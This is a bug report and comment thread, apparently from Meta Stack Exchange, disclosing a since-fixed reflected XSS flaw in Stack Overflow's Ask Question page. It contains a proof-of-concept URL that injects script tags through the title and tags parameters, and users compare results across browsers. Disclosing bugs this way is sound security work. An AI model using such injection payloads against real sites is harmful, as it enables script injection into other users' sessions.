# XSS in Ask Question page

Tags: bug, status-completed, xss

Copy paste following in browser bar,

```
https://stackoverflow.com/questions/ask?title=test"><script>alert(1)</script>"&tags="></a></div><script>alert(/1/)</script><foo+bar="
```

or

[test link (might work, but not sure)](https://stackoverflow.com/questions/ask?title=test%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%22&tags=%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28/1/%29%3C/script%3E%3Cfoo+bar=%22)

- but firefox 3.6 without noscript, executed my xss.
- opera 11, executed my xss
- chrome somehow does not execute alert, but UI is broken,

Found out tag description field is not html escaped.

Comment: Confirmed in Chrome 10 on Windows 7. Great catch.

Comment: No repro in Chrome 11 dev, but reproduced in Firefox 4's latest nightly. (Windows 7)

Comment: I **did** get an alert in Chrome 9, Gentoo. Did Chrome add fanciness to detect stuff like this?

Comment: @Michael, I don't know but In html source, there is plain <script tag, but somehow, my chrome 11 also can't get executed somehow.

Comment: Does **not** give an alert in Chrome 10 on Mac OS X.

Comment: @Michael I've turned on XSS protection in about:flags, though it disappeared in Chrome 11.

Comment: @Nyuszika7H, does the bounty imply this still needs fixing?

Comment: @Arjan Nope, I just wanted to give some credit to balpha for that Hacker badge, even if it's not real! :)

Comment: @YOU Confirmed in Firefox 4 on Mac. With NoScript turned on, it's detected at as an XSS attempt as well.

Comment: @Blowski, Actually, this supposed to be fixed already. Edit: Checked and confirmed on my firefox with NoScript too. Probably NoScript alerting everything with <script> tag in url

Comment: @YOU Yes, just checked with NoScript disabled and it's fine. Good to know that's what NoScript does...

Answer (score 9, accepted):

Just imagine it's a real one – it's for you:

[image: Hacker badge]

Comment: cool!, very quick response, thanks, I now like to have that badge :D

Comment: Hm, so `alert(false)` doesn't count for the Hacker badge?